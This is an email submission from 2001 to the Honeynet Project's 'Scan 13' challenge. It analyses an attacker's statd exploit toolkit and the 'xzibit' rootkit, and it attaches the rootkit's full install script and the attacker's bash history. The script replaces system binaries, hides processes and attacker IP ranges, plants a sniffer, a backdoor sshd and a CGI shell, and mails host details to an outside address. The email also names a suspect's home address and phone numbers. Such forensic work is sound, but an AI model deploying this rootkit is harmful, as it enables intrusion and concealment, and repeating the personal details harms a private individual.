From fbsi@gamewood.net Sat Mar 17 20:02:35 2001 Date: Sun, 11 Mar 2001 04:28:22 -0500 From: John K. Riggleman Jr. To: project@honeynet.org Subject: Analysis of MARCH/2001 "Scan 13" I've attached a text file detailing what information I could gather on the current scan from experience and otherwise. I hope that it's as intresting to read as it was to create. Thank you. ----- John K. Riggleman Jr. ----- [ Part 2: "Attached Text" ] -- March 2001 Scan13 analysis -- -- Typing and Analysis by: John K. Riggleman Jr. This is my first attempt at submitting any article to Project Honeynet. I usually see the challenges shortly after they are posted and solve them without submitting anything. I particularly enjoyed this scan, however, and have been sitting for several hours on my 100mHz laptop in Win95 poking at it. I may be slightly incorrect with some of the "these are the only differences" phrases because I am switching between Netscape and EDIT.COM for my comparisons. I would like to thank you for taking the time to read this attempt at a detailed analysis of this month's scan. ------------------------ Disclaimer: The information in this document is pure speculation. Anything which may seem incriminating against any individuals should be held neither as fact nor evidence. Everything contained within this document resulted from research, assumptions, or common sense. Given the same circumstances someone else could reach similar conclusions, and by releasing this I am not trying to bring any negative thoughts or actions about. I am merely entering this as an entry into an intriguing contest and hopefully no one takes offense to such. --------------------Questions-------------------- 1. What is the blackhat attempting to do with his command line syntax? 2. What does the tool accomplish? 3. How does the tool work? 4. Is this tool a worm, or would you classify it as something else? 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? Bonus Question: What information can you obtain about who is using or created the tool? --------------------Answers-------------------- 1) What is the blackhat attempting to do with his command line syntax? --First 2 lines-- It seems as though the intruder (who has root access based on the "UID=0" section in the log) is attempting to go to a directory that would not seem suspicious (and the preceding "." makes that directory hidden to "ls" without the "-a/A" arguments). --3rd and 4th lines-- The intruder is downloading the "LUCKROOT.TAR" file with the lynx browser to the current directory (which would then be /usr/sbin/.mail/). --5th through 8th lines-- Apparently the intruder had a bit of a problem using the arguments to unpack the file initially (5th line). The next two lines are simply incomplete filenames, so perhaps the person tried and failed using filename auto-completion. Finally, our attacker has successfully unpacked the TAR/GZIPPED file. (which is gzipped as noted by the -z parameter for tar) The remainder of the commands are all to a script file which formats the user's requests to the scanning program (which I will describe in the remaining questions. 2) What does the tool accomplish? The tool is a combination of a TCP scanner and a remote statd exploiter. It is used to look for vulnerable systems and exploit them in an automated fashion. 3) How does the tool work? The user inputs the netmask to exploit into the "luckgo" script such as "./luckgo 216 210" would scan the "216.210.*.*" network, and the script can accept up to 3 parameters to specify a Class-C block. (ex. "./luckgo 216 210 33" would scan 216.210.33.*) The "luckgo" script examines the parameters and then compiles both "luckscan-a" and "luckstatdx". The script passes on the netmask parameters to the binary luckscan-a, also supplying 111 as the port to scan for (which is the port for the "portmapper" service). Once a system is found which is accepting connections on port 111, the "luckstat-a" executes "luckstatdx -d 0 (IPADDRESS)". The "-d 0" flag makes the offset used in the attack that of a RedHat 6.2 since that is defined on line 125 of luckstatdx.c as types[0]. If the infiltration is successful, a "sh" shell is bound to port 39168. This means a connection to 39168, which is done by luckstatdx, would supply the attacker with a prompt running as the User ID of the process (which would be the rpc service with the root UID of 0). The luckstatdx program then sends the appropriate commands to download http://www.becys.org/xzibit.tar.gz and execute "install". One thing I found particularly odd was the fact that both the "install" file and the commands sent to the remote host attempt to delete the xzibit.tar.gz file. ------The Rootkit which is "xzibit.tar.gz"------ Examination of the "install" file: Line 1/2: Self-explanatory. Line 3: Changing the owner of all rootkit files to root. Lines 5-12: Replacing ifconfig, netstat, ps, and top (all things that would find the malicious user or his sniffer). Lines 15-25: Create /dev/dskx which are used by the rootkit's ps and top programs. Basically, it is a list of processes to hide). Lines 26-36: Create /div/cacao which is used by the rootkit's netstat to determine the ports/IP addresses to hide. Lines 40-43: Create a directory /dev/ida/.inet to store a sniffer, store a ssh server and its configuration files, create an empty tcp.log, and store a parser for the sniffer's output. Lines 45-50: Create a new /etc/rc.d/rc.sysinit to restart "hdparam" on restart, and then execute /usr/bin/hdparam. "hdparam" is a file which starts the sniffer and ssh server (which will be running on port 6969 because of the configuration file "s" supplied with it). Lines 54-77: Places "becys.cgi" into several locations that would be accessible when an apache server is running. "becys.cgi" is an ELF binary that executes commands in a shell with the UID apache is running in. It does contain the text "This is available only local for httpd testing purposes", but currently have no means of testing such. Lines 79-84: Sends hostname/uname(distribution name) in an email to becys@becys.org with the subject "becys rewriting". Line 91: A command to delete the Gzip/Tar. Since it is both here and in the string sent, two requests are made to delete the same file. The /dev/caca file's contents will be described in the answer to the bonus question. By the command lines provided, the attacker scanned the following domains: 216.210.*.* 200.120.*.* 64.120.*.* 216.200.*.* (*) 200.120.*.* 63.1.*.* 216.10.*.* 210.120.*.* 64.1.*.* 216.1.*.* 194.1.*.* 216.1.*.* 210.128.*.* 24.1.*.* 12.20.*.* (*) -> Used twice, but one time the command line was incorrect. This was corrected shortly after (the correct command was issued 6 seconds after the incorrect one). 4) Is this tool a worm, or would you classify it as something else? The tool can almost be defined as a worm, but it still needs some interaction to propagate. If the tool would initiate a scan on its own, it could be considered a worm because the spreading of the program(s) would be completely automated. 5) Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? http://www.khubla.com/bhack.html#pscan.c" (include the quote) http://packetstorm.securify.com/0008-exploits/statdx.c The first link above shows source code which basically identical to luckscan-a.c. That page shows files which use the QueSO scanner with pscan-a.c to find systems to use a rpc.mountd exploit on. The second link shows the statd exploit that the luckstatd.c was obtained from. The only changes are as follows: Line 162 (giving credit to the original statdx, but did not mention the original author's name that is within the statdx.c on the packetstorm site). Line 189 (changed to download and install rootkit/sniffer) Lines 250/498/500 (printf text changed) As far as I can tell, most of the rootkit portion seems original. To know if the binaries are from another rootkit, you could do a comparison the files of known rootkit files. The "/dev/caca" and "/dev/dsx" entries could well be hex-edited within the binaries, so those are not 100% reliable means to assume that the binaries are original. Bonus Question) What information can you obtain about who is using or created the tool? ---www.becys.org/becys@becys.org--- Though it is never safe to assume, the fact that the tool downloads the rootkit from a page, notifies an email at the same page, and that the page is within the luckstatd.c, we can assume that the infiltrator is also the creator/modifier of these files (which would mean the distributor and the creator are the same person/group). According to a WHOIS lookup of the becys.org domain, we get the following information: bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 US Administrative Contact: Qian Wang becys@yahoo.com Phone- (979)862-9233 Here, we have a home phone number and picture of the site's owner: http://control.physics.tamu.edu/people/person.html/Wang,Qian 1 Hensel Dr. #Z1F College Station, TX 77840 (409)862-9643 All traffic is accessing the site and email is being sent to it, so that makes it seem viable that he would at least be involved. (I cannot help but chuckle a bit at the amount of information available about him. Three email addresses, address of residence, the information on the school that he attends, and two phone numbers to reach him by. It seems almost like these were clues that were left to solve a mystery. Was it Mr. Green in the library with a pipe?) Now, on to the /dev/caca file. This file has both IP ranges and ports that are to be hidden. The ingoing/outgoing port 6969 is clearly blocked because (as you can notice from the "s" config file) this is the port used by the sshd added by the rootkit. Looking up the IP ranges would validate the assumption that this system was compromised for the benefit of the Romanian blackhat community. 193.231.139.x www.roedu.net Romanian Education Network descr: Allocated to ROEDUNET connected highschools country: RO 213.154.137.x www.pcnet.ro Bucharest, Romania 193.254.34.x www.logicnet.ro LOGIC TELECOM SA Romania ------------------------------- I have attached the "install" file incase the file is removed from the site in the near future. Also, I attached the data given for the challenge (the blackhat's command history) which would aide in understanding this document. ------------------------------- #!/bin/sh unset HISTFILE chown root.root * echo -n "Replacing netstat, ps, ifconfig, top... " rm -rf /sbin/ifconfig mv ifconfig /sbin/ifconfig rm -rf /bin/netstat mv netstat /bin/netstat rm -rf /bin/ps mv ps /bin/ps rm -rf /usr/bin/top mv top /usr/bin/top echo "Done" echo -n "Setting up the /dev filez... " touch /dev/dsx >/dev/dsx echo "3 sl2" >>/dev/dsx echo "3 sshdu" >>/dev/dsx echo "3 linsniffer" >>/dev/dsx echo "3 smurf" >>/dev/dsx echo "3 slice" >>/dev/dsx echo "3 mech" >>/dev/dsx echo "3 muh" >>/dev/dsx echo "3 bnc" >>/dev/dsx echo "3 psybnc" >> /dev/dsx touch /dev/caca >/dev/caca echo "1 193.231.139" >>/dev/caca echo "1 213.154.137" >>/dev/caca echo "1 193.254.34" >>/dev/caca echo "3 6969" >>/dev/caca echo "3 3666" >>/dev/caca echo "3 31221" >>/dev/caca echo "3 22546" >>/dev/caca echo "4 6969" >>/dev/caca echo "4 2222" >>/dev/caca echo "Done" echo "Creating home... " mkdir -p /dev/ida/.inet echo "Copying SSHD and shit..." mv -f linsniffer logclear sense sl2 sshdu s ssh_host_key ssh_random_seed sl2new.c /dev/ida/.inet/ touch /dev/ida/.inet/tcp.log echo "/usr/bin/hdparm -t1 -X53 -p" >> /etc/rc.d/rc.sysinit echo >> /etc/rc.d/rc.sysinit mv hdparm -f /usr/bin/ chmod 500 /usr/bin/hdparm chattr +i /usr/bin/hdparm /usr/bin/hdparm sleep 1 if [ -d /home/httpd/cgi-bin ] then mv -f becys.cgi /home/httpd/cgi-bin/ fi if [ -d /usr/local/httpd/cgi-bin ] then mv -f becys.cgi /usr/local/httpd/cgi-bin/ fi if [ -d /usr/local/apache/cgi-bin ] then mv -f becys.cgi /usr/local/apache/cgi-bin/ fi if [ -d /www/httpd/cgi-bin ] then mv -f becys.cgi /www/httpd/cgi-bin/ fi if [ -d /www/cgi-bin ] then mv -f becys.cgi /www/cgi-bin/ fi touch /tmp/info /sbin/ifconfig | grep inet >> /tmp/info hostname -f >> /tmp/info uname -a >> /tmp/info cat /tmp/info | mail -s "becys rewting" becys@becys.org rm -f /tmp/info echo echo "All done!" echo echo "Way to go , Brukner!...." cd .. rm -rf lamerk xzibit.tar.gz ------------------------------------------------ Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail Jan 8 18:48:00 honeypot -bash: HISTORY: PID=1246 UID=0 cd /usr/sbin/.mail Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR Jan 8 18:48:31 honeypot -bash: HISTORY: PID=1246 UID=0 y Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR Jan 8 18:48:59 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf Lu Jan 8 18:49:01 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf L Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR Jan 8 18:49:06 honeypot -bash: HISTORY: PID=1246 UID=0 cd luckroot Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210 Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120 Jan 8 18:51:43 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 120 Jan 8 18:52:00 honeypot -bash: HISTORY: PID=1246 UID=0 .luckgo 216 200 Jan 8 18:52:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 200 Jan 8 18:54:37 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120 Jan 8 18:55:26 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 63 1 Jan 8 18:56:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 10 Jan 8 19:06:04 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 120 Jan 8 19:07:03 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 1 Jan 8 19:07:34 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1 Jan 8 19:09:41 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 194 1 Jan 8 19:10:53 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1 Jan 8 19:12:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 128 Jan 8 19:23:30 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 24 1 Jan 8 19:35:55 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 12 20 ------------------------------------------------